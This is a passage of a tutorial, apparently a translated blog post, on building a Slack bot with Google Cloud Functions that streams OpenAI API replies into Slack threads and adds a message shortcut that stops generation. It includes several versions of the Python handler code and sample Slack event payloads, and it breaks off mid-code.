Currently, there is no functionality, it just allows the Slack App to pass the Event Subscriptions verification. You can directly click “Deploy” to complete the first deployment.
⚠️If you are not familiar with the Cloud Functions editor, you can scroll down to the bottom of the article to see the supplementary content.
After the deployment is complete (green checkmark), copy the Cloud Functions URL:
Paste the Request URL back into the Slack App Enable Events.
If everything is correct, “Verified” will appear, completing the verification.
What happens here is that when a verification request is received from Slack:
1
+2
+3
+4
+5
+
{
+ "token": "Jhj5dZrVaK7ZwHHjRyZWjbDl",
+ "challenge": "3eZbrw1aBm2rZgRNFdxV2595E9CY3gmdALWMmHkvFXO7tYXAYM8P",
+ "type": "url_verification"
+}
+
Respond with the content of the challenge
field to pass the verification.
After enabling successfully, scroll down to find the “Subscribe to bot events” section, click “Add Bot User Event” to add the “message.im” permission.
After adding the full permissions, click the “reinstall your app” link at the top to reinstall the Slack App to the Workspace, and the Slack App setup is complete.
You can also go to “App Home” or “Basic Information” to customize the Slack App’s name and avatar.
Basic Information
First, we need to obtain the essential OPENAI API KEY
and Bot User OAuth Token
.
OPENAI API KEY
: OpenAI API key page.Bot User OAuth Token
: OAuth Tokens for Your Workspace.When a user sends a message to the Slack App, the following Event JSON Payload is received:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+
{
+ "token": "XXX",
+ "team_id": "XXX",
+ "context_team_id": "XXX",
+ "context_enterprise_id": null,
+ "api_app_id": "XXX",
+ "event": {
+ "client_msg_id": "XXX",
+ "type": "message",
+ "text": "你好",
+ "user": "XXX",
+ "ts": "1707920753.115429",
+ "blocks": [
+ {
+ "type": "rich_text",
+ "block_id": "orfng",
+ "elements": [
+ {
+ "type": "rich_text_section",
+ "elements": [
+ {
+ "type": "text",
+ "text": "你好"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "team": "XXX",
+ "channel": "XXX",
+ "event_ts": "1707920753.115429",
+ "channel_type": "im"
+ },
+ "type": "event_callback",
+ "event_id": "XXX",
+ "event_time": 1707920753,
+ "authorizations": [
+ {
+ "enterprise_id": null,
+ "team_id": "XXX",
+ "user_id": "XXX",
+ "is_bot": true,
+ "is_enterprise_install": false
+ }
+ ],
+ "is_ext_shared_channel": false,
+ "event_context": "4-XXX"
+}
+
Based on the above Json Payload, we can complete the integration from Slack messages to the OpenAI API and then back to replying to Slack messages:
Cloud Functions main.py
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+134
+135
+136
+137
+138
+139
+140
+141
+142
+143
+144
+145
+146
+147
+148
+149
+150
+151
+152
+153
+154
+155
+156
+157
+158
+159
+160
+161
+162
+163
+164
+165
+166
+167
+168
+169
+170
+171
+172
+173
+174
+175
+176
+177
+178
+179
+180
+181
+182
+183
+184
+185
+186
+
import functions_framework
+import requests
+import asyncio
+import json
+import time
+from openai import AsyncOpenAI
+
+OPENAI_API_KEY = "OPENAI API KEY"
+SLACK_BOT_TOKEN = "Bot User OAuth Token"
+
+# The OPENAI API Model used
+# https://platform.openai.com/docs/models
+OPENAI_MODEL = "gpt-4-1106-preview"
+
+@functions_framework.http
+def hello_http(request):
+ request_json = request.get_json(silent=True)
+ request_args = request.args
+ request_headers = request.headers
+
+ # You can simply use print to record runtime logs, which can be viewed in Logs
+ # For advanced Logging Level usage, refer to: https://cloud.google.com/logging/docs/reference/libraries
+ print(request_json)
+
+ # Due to the nature of FAAS (Cloud Functions), if the service is not called for a long time, it will enter a cold start when called again, which may not respond within the 3-second limit set by Slack
+ # Additionally, the OpenAI API request to response takes a certain amount of time (depending on the response length, it may take close to 1 minute to complete)
+ # If Slack does not receive a response within the time limit, it will consider the request lost and will call again
+ # This can cause duplicate requests and responses, so we can set X-Slack-No-Retry: 1 in the Response Headers to inform Slack not to retry even if it does not receive a response within the time limit
+ headers = {'X-Slack-No-Retry':1}
+
+ # If it is a Slack Retry request...ignore it
+ if request_headers and 'X-Slack-Retry-Num' in request_headers:
+ return ('OK!', 200, headers)
+
+ # Slack App Event Subscriptions Verify
+ # https://api.slack.com/events/url_verification
+ if request_json and 'type' in request_json and request_json['type'] == 'url_verification':
+ challenge = ""
+ if 'challenge' in request_json:
+ challenge = request_json['challenge']
+ return (challenge, 200, headers)
+
+ # Handle Event Subscriptions Events...
+ if request_json and 'event' in request_json and 'type' in request_json['event']:
+ # If the event source is the App and the App ID == Slack App ID, it means the event was triggered by the Slack App itself
+ # Ignore and do not process, otherwise it will fall into an infinite loop Slack App -> Cloud Functions -> Slack App -> Cloud Functions...
+ if 'api_app_id' in request_json and 'app_id' in request_json['event'] and request_json['api_app_id'] == request_json['event']['app_id']:
+ return ('OK!', 200, headers)
+
+ # Event name, for example: message (related to messages), app_mention (mentioned)....
+ eventType = request_json['event']['type']
+
+ # SubType, for example: message_changed (edited message), message_deleted (deleted message)...
+ # New messages do not have a Sub Type
+ eventSubType = None
+ if 'subtype' in request_json['event']:
+ eventSubType = request_json['event']['subtype']
+
+ if eventType == 'message':
+ # Messages with Sub Type are edited, deleted, replied to...
+ # Ignore and do not process
+ if eventSubType is not None:
+ return ("OK!", 200, headers)
+
+ # Sender of the event message
+ eventUser = request_json['event']['user']
+ # Channel of the event message
+ eventChannel = request_json['event']['channel']
+ # Content of the event message
+ eventText = request_json['event']['text']
+ # TS (message ID) of the event message
+ eventTS = request_json['event']['event_ts']
+
+ # TS (message ID) of the parent message in the thread of the event message
+ # Only new messages in the thread will have this data
+ eventThreadTS = None
+ if 'thread_ts' in request_json['event']:
+ eventThreadTS = request_json['event']['thread_ts']
+
+ openAIRequest(eventChannel, eventTS, eventThreadTS, eventText)
+ return ("OK!", 200, headers)
+
+
+ return ("Access Denied!", 400, headers)
+
+def openAIRequest(eventChannel, eventTS, eventThreadTS, eventText):
+
+ # Set Custom instructions
+ # Thanks to my colleague (https://twitter.com/je_suis_marku) for the support
+ messages = [
+ {"role": "system", "content": "I can only understand Traditional Chinese from Taiwan and English"},
+ {"role": "system", "content": "I cannot understand Simplified Chinese"},
+ {"role": "system", "content": "If I speak Chinese, I will respond in Traditional Chinese from Taiwan, and it must conform to common Taiwanese usage."},
+ {"role": "system", "content": "If I speak English, I will respond in English."},
+ {"role": "system", "content": "Do not respond with pleasantries."},
+ {"role": "system", "content": "There should be a space between Chinese and English. There should be a space between Chinese characters and any other language characters, including numbers and emojis."},
+ {"role": "system", "content": "If you don't know the answer, or if your knowledge is outdated, please search online before answering."},
+ {"role": "system", "content": "I will tip you 200 USD, if you answer well."}
+ ]
+
+ messages.append({
+ "role": "user", "content": eventText
+ })
+
+ replyMessageTS = slackRequestPostMessage(eventChannel, eventTS, "Generating response...")
+ asyncio.run(openAIRequestAsync(eventChannel, replyMessageTS, messages))
+
+async def openAIRequestAsync(eventChannel, eventTS, messages):
+ client = AsyncOpenAI(
+ api_key=OPENAI_API_KEY,
+ )
+
+ # Stream Response
+ stream = await client.chat.completions.create(
+ model=OPENAI_MODEL,
+ messages=messages,
+ stream=True,
+ )
+
+ result = ""
+
+ try:
+ debounceSlackUpdateTime = None
+ async for chunk in stream:
+ result += chunk.choices[0].delta.content or ""
+
+ # Update the message every 0.8 seconds to avoid frequent calls to the Slack Update Message API, which may fail or waste Cloud Functions request counts
+ if debounceSlackUpdateTime is None or time.time() - debounceSlackUpdateTime >= 0.8:
+ response = slackUpdateMessage(eventChannel, eventTS, None, result+"...")
+ debounceSlackUpdateTime = time.time()
+ except Exception as e:
+ print(e)
+ result += "...*[Error occurred]*"
+
+ slackUpdateMessage(eventChannel, eventTS, None, result)
+
+
+### Slack ###
+def slackUpdateMessage(channel, ts, metadata, text):
+ endpoint = "/chat.update"
+ payload = {
+ "channel": channel,
+ "ts": ts
+ }
+ if metadata is not None:
+ payload['metadata'] = metadata
+
+ payload['text'] = text
+
+ response = slackRequest(endpoint, "POST", payload)
+ return response
+
+def slackRequestPostMessage(channel, target_ts, text):
+ endpoint = "/chat.postMessage"
+ payload = {
+ "channel": channel,
+ "text": text,
+ }
+ if target_ts is not None:
+ payload['thread_ts'] = target_ts
+
+ response = slackRequest(endpoint, "POST", payload)
+
+ if response is not None and 'ts' in response:
+ return response['ts']
+ return None
+
+def slackRequest(endpoint, method, payload):
+ url = "https://slack.com/api"+endpoint
+
+ headers = {
+ "Authorization": f"Bearer {SLACK_BOT_TOKEN}",
+ "Content-Type": "application/json",
+ }
+
+ response = None
+ if method == "POST":
+ response = requests.post(url, headers=headers, data=json.dumps(payload))
+ elif method == "GET":
+ response = requests.post(url, headers=headers)
+
+ if response and response.status_code == 200:
+ result = response.json()
+ return result
+ else:
+ return None
+
Back to Slack to test:
Now you can perform Q&A similar to ChatGPT and OpenAI API.
There are many ways to implement this. For example, if a user inputs a new message in the same thread before the previous response is complete, it interrupts the previous response, or by clicking a message to add an interruption shortcut.
This article uses the example of adding a “Message Interruption” shortcut.
Regardless of the interruption method, the core principle is the same. Since we do not have a database to store generated messages and message status information, the implementation relies on the metadata field of Slack messages (which can store custom information within specified messages).
When using the chat.update API Endpoint, if the call is successful, it will return the text content and metadata of the current message. Therefore, in the above OpenAI API Stream -> Slack Update Message code, we add a judgment to check if the metadata in the response of the modification request has an “interruption” mark. If it does, it interrupts the OpenAI Stream Response.
First, you need to add a Slack App message shortcut
Go to the Slack App management interface, find the “Interactivity & Shortcuts” section, click to enable it, and use the same Cloud Functions URL.
Click “Create New Shortcut” to add a new message shortcut.
Select “On messages”.
Stop OpenAI API Response
Stop OpenAI API Response
abort_openai_api
(for program identification, can be customized)Click “Create” to complete the creation, and finally remember to click “Save Changes” at the bottom right to save the settings.
Click “reinstall your app” at the top again to take effect.
Back in Slack, click the “…” at the top right of the message, and the “Stop OpenAI API Response” shortcut will appear (clicking it at this time has no effect).
When the user presses the Shortcut on the message, an Event Json Payload will be sent:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+
{
+ "type": "message_action",
+ "token": "XXXXXX",
+ "action_ts": "1706188005.387646",
+ "team": {
+ "id": "XXXXXX",
+ "domain": "XXXXXX-XXXXXX"
+ },
+ "user": {
+ "id": "XXXXXX",
+ "username": "zhgchgli",
+ "team_id": "XXXXXX",
+ "name": "zhgchgli"
+ },
+ "channel": {
+ "id": "XXXXXX",
+ "name": "directmessage"
+ },
+ "is_enterprise_install": false,
+ "enterprise": null,
+ "callback_id": "abort_openai_api",
+ "trigger_id": "XXXXXX",
+ "response_url": "https://hooks.slack.com/app/XXXXXX/XXXXXX/XXXXXX",
+ "message_ts": "1706178957.161109",
+ "message": {
+ "bot_id": "XXXXXX",
+ "type": "message",
+ "text": "The English translation of 高麗菜包 is \"cabbage wrap.\" If you are using it as a dish name, it may sometimes be named specifically according to the contents of the dish, such as \"pork cabbage wrap\" or \"vegetable cabbage wrap.\"",
+ "user": "XXXXXX",
+ "ts": "1706178957.161109",
+ "app_id": "XXXXXX",
+ "blocks": [
+ {
+ "type": "rich_text",
+ "block_id": "eKgaG",
+ "elements": [
+ {
+ "type": "rich_text_section",
+ "elements": [
+ {
+ "type": "text",
+ "text": "The English translation of 高麗菜包 is \"cabbage wrap.\" If you are using it as a dish name, it may sometimes be named specifically according to the contents of the dish, such as \"pork cabbage wrap\" or \"vegetable cabbage wrap.\""
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "team": "XXXXXX",
+ "bot_profile": {
+ "id": "XXXXXX",
+ "deleted": false,
+ "name": "Rick C-137",
+ "updated": 1706001605,
+ "app_id": "XXXXXX",
+ "icons": {
+ "image_36": "https://avatars.slack-edge.com/2024-01-23/6517244582244_0c708dfa3f893c72d4c2_36.png",
+ "image_48": "https://avatars.slack-edge.com/2024-01-23/6517244582244_0c708dfa3f893c72d4c2_48.png",
+ "image_72": "https://avatars.slack-edge.com/2024-01-23/6517244582244_0c708dfa3f893c72d4c2_72.png"
+ },
+ "team_id": "XXXXXX"
+ },
+ "edited": {
+ "user": "XXXXXX",
+ "ts": "1706187989.000000"
+ },
+ "thread_ts": "1706178832.102439",
+ "parent_user_id": "XXXXXX"
+ }
+}
+
Complete Cloud Functions main.py
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+134
+135
+136
+137
+138
+139
+140
+141
+142
+143
+144
+145
+146
+147
+148
+149
+150
+151
+152
+153
+154
+155
+156
+157
+158
+159
+160
+161
+162
+163
+164
+165
+166
+167
+168
+169
+170
+171
+172
+173
+174
+175
+176
+177
+178
+179
+180
+181
+182
+183
+184
+185
+186
+187
+188
+189
+190
+191
+192
+193
+194
+195
+196
+197
+198
+199
+200
+201
+202
+203
+204
+205
+206
+207
+208
+209
+210
+211
+212
+213
+214
+215
+216
+217
+218
+219
+220
+221
+222
+223
+224
+225
+226
+227
+228
+229
+230
+231
+232
+233
+234
+235
+236
+237
+238
+239
+240
+241
+242
+243
+244
+245
+246
+247
+248
+249
+250
+251
+252
+253
+254
+255
+256
+257
+258
+259
+
import functions_framework
+import requests
+import asyncio
+import json
+import time
+from openai import AsyncOpenAI
+
+OPENAI_API_KEY = "OPENAI API KEY"
+SLACK_BOT_TOKEN = "Bot User OAuth Token"
+
+# The OPENAI API Model used
+# https://platform.openai.com/docs/models
+OPENAI_MODEL = "gpt-4-1106-preview"
+
+@functions_framework.http
+def hello_http(request):
+ request_json = request.get_json(silent=True)
+ request_args = request.args
+ request_headers = request.headers
+
+ # Shortcut Event will be given from post payload field
+ # https://api.slack.com/reference/interaction-payloads/shortcuts
+ payload = request.form.get('payload')
+ if payload is not None:
+ payload = json.loads(payload)
+
+ # You can simply use print to record runtime logs, which can be viewed in Logs
+ # For advanced Logging Level usage, refer to: https://cloud.google.com/logging/docs/reference/libraries
+ print(payload)
+
+ # Due to the nature of FAAS (Cloud Functions), if the service is not called for a long time, it will enter a cold start when called again, which may not respond within the 3-second limit set by Slack
+ # Additionally, the OpenAI API request takes a certain amount of time to respond (depending on the response length, it may take nearly 1 minute to complete)
+ # If Slack does not receive a response within the time limit, it will consider the request lost and will call again
+ # This will cause repeated requests and responses, so we can set X-Slack-No-Retry: 1 in the Response Headers to inform Slack not to retry even if it does not receive a response within the time limit
+ headers = {'X-Slack-No-Retry': 1}
+
+ # If it is a Slack Retry request...ignore it
+ if request_headers and 'X-Slack-Retry-Num' in request_headers:
+ return ('OK!', 200, headers)
+
+ # Slack App Event Subscriptions Verify
+ # https://api.slack.com/events/url_verification
+ if request_json and 'type' in request_json and request_json['type'] == 'url_verification':
+ challenge = ""
+ if 'challenge' in request_json:
+ challenge = request_json['challenge']
+ return (challenge, 200, headers)
+
+ # Handle Event Subscriptions Events...
+ if request_json and 'event' in request_json and 'type' in request_json['event']:
+ # If the Event source is the App and App ID == Slack App ID, it means the event was triggered by the Slack App itself
+ # Ignore and do not process, otherwise it will fall into an infinite loop Slack App -> Cloud Functions -> Slack App -> Cloud Functions...
+ if 'api_app_id' in request_json and 'app_id' in request_json['event'] and request_json['api_app_id'] == request_json['event']['app_id']:
+ return ('OK!', 200, headers)
+
+ # Event name, for example: message (related to messages), app_mention (mentioned)...
+ eventType = request_json['event']['type']
+
+ # SubType, for example: message_changed (edited message), message_deleted (deleted message)...
+ # New messages do not have Sub Type
+ eventSubType = None
+ if 'subtype' in request_json['event']:
+ eventSubType = request_json['event']['subtype']
+
+ if eventType == 'message':
+ # Messages with Sub Type are edited, deleted, replied to...
+ # Ignore and do not process
+ if eventSubType is not None:
+ return ("OK!", 200, headers)
+
+ # Message sender of the Event
+ eventUser = request_json['event']['user']
+ # Channel of the Event message
+ eventChannel = request_json['event']['channel']
+ # Content of the Event message
+ eventText = request_json['event']['text']
+ # TS (message ID) of the Event message
+ eventTS = request_json['event']['event_ts']
+
+ # TS (message ID) of the parent message in the thread of the Event message
+ # Only new messages in the thread will have this data
+ eventThreadTS = None
+ if 'thread_ts' in request_json['event']:
+ eventThreadTS = request_json['event']['thread_ts']
+
+ openAIRequest(eventChannel, eventTS, eventThreadTS, eventText)
+ return ("OK!", 200, headers)
+
+
+ # Handle Shortcut
+ if payload and 'type' in payload:
+ payloadType = payload['type']
+
+ # If it is a message Shortcut
+ if payloadType == 'message_action':
+ print(payloadType)
+ callbackID = None
+ channel = None
+ ts = None
+ text = None
+ triggerID = None
+
+ if 'callback_id' in payload:
+ callbackID = payload['callback_id']
+ if 'channel' in payload:
+ channel = payload['channel']['id']
+ if 'message' in payload:
+ ts = payload['message']['ts']
+ text = payload['message']['text']
+ if 'trigger_id' in payload:
+ triggerID = payload['trigger_id']
+
+ if channel is not None and ts is not None and text is not None:
+ # If it is the Stop OpenAI API Response Generation Shortcut
+ if callbackID == "abort_openai_api":
+ slackUpdateMessage(channel, ts, {"event_type": "aborted", "event_payload": {}}, text)
+ if triggerID is not None:
+ slackOpenModal(triggerID, callbackID, "Successfully stopped OpenAI API response generation!")
+ return ("OK!", 200, headers)
+
+ return ("OK!", 200, headers)
+
+
+ return ("Access Denied!", 400, headers)
+
+def openAIRequest(eventChannel, eventTS, eventThreadTS, eventText):
+
+ # Set Custom instructions
+ # Thanks to colleague (https://twitter.com/je_suis_marku) for support
+ messages = [
+ {"role": "system", "content": "I can only understand Traditional Chinese from Taiwan and English"},
+ {"role": "system", "content": "I cannot understand Simplified Chinese"},
+ {"role": "system", "content": "If I speak Chinese, I will respond in Traditional Chinese from Taiwan, and it must conform to common Taiwanese usage."},
+ {"role": "system", "content": "If I speak English, I will respond in English."},
+ {"role": "system", "content": "Do not respond with pleasantries."},
+ {"role": "system", "content": "There should be a space between Chinese and English. There should be a space between Chinese characters and any other language characters, including numbers and emojis."},
+ {"role": "system", "content": "If you don't know the answer, or your knowledge is outdated, please search online before answering."},
+ {"role": "system", "content": "I will tip you 200 USD, if you answer well."}
+ ]
+
+ messages.append({
+ "role": "user", "content": eventText
+ })
+
+ replyMessageTS = slackRequestPostMessage(eventChannel, eventTS, "Generating response...")
+ asyncio.run(openAIRequestAsync(eventChannel, replyMessageTS, messages))
+
+async def openAIRequestAsync(eventChannel, eventTS, messages):
+ client = AsyncOpenAI(
+ api_key=OPENAI_API_KEY,
+ )
+
+ # Stream Response
+ stream = await client.chat.completions.create(
+ model=OPENAI_MODEL,
+ messages=messages,
+ stream=True,
+ )
+
+ result = ""
+
+ try:
+ debounceSlackUpdateTime = None
+ async for chunk in stream:
+ result += chunk.choices[0].delta.content or ""
+
+ # Update the message every 0.8 seconds to avoid frequent calls to the Slack Update Message API, which may fail or waste Cloud Functions request counts
+ if debounceSlackUpdateTime is None or time.time() - debounceSlackUpdateTime >= 0.8:
+ response = slackUpdateMessage(eventChannel, eventTS, None, result+"...")
+ debounceSlackUpdateTime = time.time()
+
+ # If the message has metadata & metadata event_type == aborted, it means the response has been marked as terminated by the user
+ if response and 'ok' in response and response['ok'] == True and 'message' in response and 'metadata' in response['message'] and 'event_type' in response['message']['metadata'] and response['message']['metadata']['event_type'] == "aborted":
+ break
+ result += "...*[Terminated]*"
+ # The message has been deleted
+ elif response and 'ok' in response and response['ok'] == False and 'error' in response and response['error'] == "message_not_found":
+ break
+
+ await stream.close()
+
+ except Exception as e:
+ print(e)
+ result += "...*[Error occurred]*"
+
+ slackUpdateMessage(eventChannel, eventTS, None, result)
+
+
+### Slack ###
+def slackOpenModal(trigger_id, callback_id, text):
+ slackRequest("/views.open", "POST", {
+ "trigger_id": trigger_id,
+ "view": {
+ "type": "modal",
+ "callback_id": callback_id,
+ "title": {
+ "type": "plain_text",
+ "text": "Prompt"
+ },
+ "blocks": [
+ {
+ "type": "section",
+ "text": {
+ "type": "mrkdwn",
+ "text": text
+ }
+ }
+ ]
+ }
+ })
+
+def slackUpdateMessage(channel, ts, metadata, text):
+ endpoint = "/chat.update"
+ payload = {
+ "channel": channel,
+ "ts": ts
+ }
+ if metadata is not None:
+ payload['metadata'] = metadata
+
+ payload['text'] = text
+
+ response = slackRequest(endpoint, "POST", payload)
+ return response
+
+def slackRequestPostMessage(channel, target_ts, text):
+ endpoint = "/chat.postMessage"
+ payload = {
+ "channel": channel,
+ "text": text,
+ }
+ if target_ts is not None:
+ payload['thread_ts'] = target_ts
+
+ response = slackRequest(endpoint, "POST", payload)
+
+ if response is not None and 'ts' in response:
+ return response['ts']
+ return None
+
+def slackRequest(endpoint, method, payload):
+ url = "https://slack.com/api"+endpoint
+
+ headers = {
+ "Authorization": f"Bearer {SLACK_BOT_TOKEN}",
+ "Content-Type": "application/json",
+ }
+
+ response = None
+ if method == "POST":
+ response = requests.post(url, headers=headers, data=json.dumps(payload))
+ elif method == "GET":
+ response = requests.post(url, headers=headers)
+
+ if response and response.status_code == 200:
+ result = response.json()
+ return result
+ else:
+ return None
+
Back to Slack to test:
Success! When we complete the Stop OpenAI API
Shortcut, the ongoing response will be terminated, and it will respond with [Terminated].
Similarly, you can also create a Shortcut to delete messages, implementing the deletion of messages sent by the Slack App.
If you send a new message in the same thread, it can be considered a follow-up question to the same issue. At this point, you can add a feature to supplement the new prompt with the previous conversation content.
Add slackGetReplies
& Fill Content into OpenAI API Prompt:
Complete Cloud Functions main.py
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+134
+135
+136
+137
+138
+139
+140
+141
+142
+143
+144
+145
+146
+147
+148
+149
+150
+151
+152
+153
+154
+155
+156
+157
+158
+159
+160
+161
+162
+163
+164
+165
+166
+167
+168
+169
+170
+171
+172
+173
+174
+175
+176
+177
+178
+179
+180
+181
+182
+183
+184
+185
+186
+187
+188
+189
+190
+191
+192
+193
+194
+195
+196
+197
+198
+199
+200
+201
+202
+203
+204
+205
+206
+207
+208
+209
+210
+211
+212
+213
+214
+215
+216
+217
+218
+219
+220
+221
+222
+223
+224
+225
+226
+227
+228
+229
+230
+231
+232
+233
+234
+235
+236
+237
+238
+239
+240
+241
+242
+243
+244
+245
+246
+247
+248
+249
+250
+251
+252
+253
+254
+255
+256
+257
+258
+259
+260
+261
+262
+263
+264
+265
+266
+267
+268
+269
+270
+271
+272
+273
+274
+275
+276
+277
+278
+279
+280
+281
+282
+283
+284
+285
+286
+287
+
import functions_framework
+import requests
+import asyncio
+import json
+import time
+from openai import AsyncOpenAI
+
+OPENAI_API_KEY = "OPENAI API KEY"
+SLACK_BOT_TOKEN = "Bot User OAuth Token"
+
+# The OPENAI API Model used
+# https://platform.openai.com/docs/models
+OPENAI_MODEL = "gpt-4-1106-preview"
+
+@functions_framework.http
+def hello_http(request):
+ request_json = request.get_json(silent=True)
+ request_args = request.args
+ request_headers = request.headers
+
+ # Event from Shortcut will be given in post payload field
+ # https://api.slack.com/reference/interaction-payloads/shortcuts
+ payload = request.form.get('payload')
+ if payload is not None:
+ payload = json.loads(payload)
+
+ # You can simply use print to record runtime logs, which can be viewed in Logs
+ # For advanced Logging Level usage, refer to: https://cloud.google.com/logging/docs/reference/libraries
+ print(payload)
+
+ # Due to the nature of FAAS (Cloud Functions), if the service is not called for a long time, it will enter a cold start when called again, which may not respond within Slack's 3-second limit
+ # Plus, OpenAI API requests take a certain amount of time to respond (depending on the response length, it may take up to 1 minute to complete)
+ # If Slack does not receive a response within the time limit, it will consider the request lost and will call again
+ # This can cause duplicate requests and responses, so we can set X-Slack-No-Retry: 1 in the Response Headers to inform Slack not to retry even if it does not receive a response within the time limit
+ headers = {'X-Slack-No-Retry':1}
+
+ # If it's a Slack Retry request...ignore it
+ if request_headers and 'X-Slack-Retry-Num' in request_headers:
+ return ('OK!', 200, headers)
+
+ # Slack App Event Subscriptions Verify
+ # https://api.slack.com/events/url_verification
+ if request_json and 'type' in request_json and request_json['type'] == 'url_verification':
+ challenge = ""
+ if 'challenge' in request_json:
+ challenge = request_json['challenge']
+ return (challenge, 200, headers)
+
+ # Handle Event Subscriptions Events...
+ if request_json and 'event' in request_json and 'type' in request_json['event']:
+ apiAppID = None
+ if 'api_app_id' in request_json:
+ apiAppID = request_json['api_app_id']
+ # If the event source is the App and App ID == Slack App ID, it means the event was triggered by the Slack App itself
+ # Ignore it to avoid infinite loops Slack App -> Cloud Functions -> Slack App -> Cloud Functions...
+ if 'app_id' in request_json['event'] and apiAppID == request_json['event']['app_id']:
+ return ('OK!', 200, headers)
+
+ # Event name, e.g., message (related to messages), app_mention (mentioned)....
+ eventType = request_json['event']['type']
+
+ # SubType, e.g., message_changed (edited message), message_deleted (deleted message)...
+ # New messages do not have a Sub Type
+ eventSubType = None
+ if 'subtype' in request_json['event']:
+ eventSubType = request_json['event']['subtype']
+
+ if eventType == 'message':
+ # Messages with Sub Type are edited, deleted, or replied to...
+ # Ignore them
+ if eventSubType is not None:
+ return ("OK!", 200, headers)
+
+ # Message sender of the Event
+ eventUser = request_json['event']['user']
+ # Channel of the Event message
+ eventChannel = request_json['event']['channel']
+ # Content of the Event message
+ eventText = request_json['event']['text']
+ # TS (message ID) of the Event message
+ eventTS = request_json['event']['event_ts']
+
+ # TS (message ID) of the parent message in the thread of the Event message
+ # Only new messages in the thread will have this data
+ eventThreadTS = None
+ if 'thread_ts' in request_json['event']:
+ eventThreadTS = request_json['event']['thread_ts']
+
+ openAIRequest(apiAppID, eventChannel, eventTS, eventThreadTS, eventText)
+ return ("OK!", 200, headers)
+
+
+ # Handle Shortcut (message)
+ if payload and 'type' in payload:
+ payloadType = payload['type']
+
+ # If it's a message Shortcut
+ if payloadType == 'message_action':
+ callbackID = None
+ channel = None
+ ts = None
+ text = None
+ triggerID = None
+
+ if 'callback_id' in payload:
+ callbackID = payload['callback_id']
+ if 'channel' in payload:
+ channel = payload['channel']['id']
+ if 'message' in payload:
+ ts = payload['message']['ts']
+ text = payload['message']['text']
+ if 'trigger_id' in payload:
+ triggerID = payload['trigger_id']
+
+ if channel is not None and ts is not None and text is not None:
+ # If it's the Stop OpenAI API response Shortcut
+ if callbackID == "abort_openai_api":
+ slackUpdateMessage(channel, ts, {"event_type": "aborted", "event_payload": { }}, text)
+ if triggerID is not None:
+ slackOpenModal(triggerID, callbackID, "Successfully stopped OpenAI API response!")
+ return ("OK!", 200, headers)
+
+
+ return ("Access Denied!", 400, headers)
+
+def openAIRequest(apiAppID, eventChannel, eventTS, eventThreadTS, eventText):
+
+ # Set Custom instructions
+ # Thanks to my colleague (https://twitter.com/je_suis_marku) for the support
+ messages = [
+ {"role": "system", "content": "I can only understand Traditional Chinese and English"},
+ {"role": "system", "content": "I cannot understand Simplified Chinese"},
+ {"role": "system", "content": "If I speak Chinese, I will respond in Traditional Chinese used in Taiwan, and it must conform to common usage in Taiwan."},
+ {"role": "system", "content": "If I speak English, I will respond in English."},
+ {"role": "system", "content": "Do not respond with pleasantries."},
+ {"role": "system", "content": "There should be a space between Chinese and English. There should be a space between Chinese characters and any other language characters, including numbers and emojis."},
+ {"role": "system", "content": "If you don't know the answer, or if your knowledge is outdated, please search online before answering."},
+ {"role": "system", "content": "I will tip you 200 USD if you answer well."}
+ ]
+
+ if eventThreadTS is not None:
+ threadMessages = slackGetReplies(eventTS, eventThreadTS)
+ if threadMessages is not None:
+ for threadMessage in threadMessages:
+ appID = None
+ if 'app_id' in threadMessage:
+ appID = threadMessage['app_id']
+ threadMessageText = threadMessage['text']
+ threadMessageTs = threadMessage['ts']
